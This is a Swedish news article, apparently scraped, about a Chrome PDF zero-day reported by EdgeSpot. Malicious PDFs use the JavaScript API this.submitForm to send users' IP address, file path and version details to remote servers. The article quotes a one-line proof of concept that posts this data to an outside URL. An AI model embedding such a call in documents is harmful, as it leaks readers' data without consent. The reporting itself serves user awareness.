I Chrome-sårbarheten kan hackare samla in användardata via pdf-filer

Innehållsförteckning:

Video: PDF Reader for Google Chrome: Student Take-Home Installation 2024

Video: PDF Reader for Google Chrome: Student Take-Home Installation 2024
Anonim

Utnyttja upptäcktjänst EdgeSpot upptäckte en spännande Chrome-nolldagars sårbarhet som utnyttjade PDF-dokument. Sårbarheten gör det möjligt för angripare att skörda känslig information med skadliga PDF-dokument öppnade i Chrome.

Så snart offret öppnar respektive PDF-filer i Google Chrome börjar ett skadligt program fungera i bakgrunden genom att samla in användardata.

Uppgifterna vidarebefordras sedan till fjärrservern som kontrolleras av hackarna. Du undrar kanske vilken data som sugs av angriparna, de riktar sig till följande data på din dator:

  • IP-adress
  • PDF-filens hela sökväg på systemet
  • OS- och Chrome-versioner

Se upp för skadade PDF-filer med skadlig kod

Du kanske blir förvånad över att veta att ingenting händer när Adobe Reader används för att öppna PDF-filer. Dessutom används HTTP POST-förfrågningar för att överföra data till fjärrservern utan någon användarintrång.

Experter upptäckte att en av de två domänerna readnotifycom eller burpcollaboratornet tog emot uppgifterna.

Du kan föreställa dig intensiteten av attacken genom att tänka på det faktum att de flesta av antivirusprogramvaran inte kan upptäcka prover som upptäcks av EdgeSpot.

Experter avslöjar att angriparna använder “this.submitForm ()” PDF Javascript API för att samla in känslig information från användarna.

Vi testade det med en minimal PoC, ett enkelt API-samtal som "this.submitForm ('http://google.com/test')" kommer att göra att Google Chrome skickar personuppgifterna till google.com.

Experterna fick faktiskt veta att det här Chrome-felet utnyttjades av två olika uppsättningar av skadliga PDF-filer. Båda cirkulerade i oktober 2017 respektive september 2018.

Särskilt kan de insamlade uppgifterna användas av angriparna för att finjustera attacker i framtiden. Rapporter tyder på att den första filgruppen har sammanställts med ReadNotifys PDF-spårningstjänst.

Användare kan använda tjänsten för att hålla reda på användarvyer. EdgeSpot har inte delat några detaljer angående arten av den andra uppsättningen av PDF-filer.

Hur man håller sig skyddad

Exploit-upptäcktjänsten EdgeSpot ville varna användarna Chrome-användare om de potentiella riskerna eftersom korrigeringen inte förväntas släppas inom en snar framtid.

EdgeSpot rapporterade till Google om sårbarheten förra året och företaget lovade att släppa en lapp i slutet av april. H

Du kan dock överväga att använda en tillfällig lösning på problemet genom att lokalt visa de mottagna PDF-dokumenten med en alternativ PDF-läsar-app.

Alternativt kan du också öppna dina PDF-dokument i Chrome genom att koppla bort dina system från Internet. Under tiden kan du vänta på Chrome 74-uppdateringen som förväntas lanseras 23 april.

I Chrome-sårbarheten kan hackare samla in användardata via pdf-filer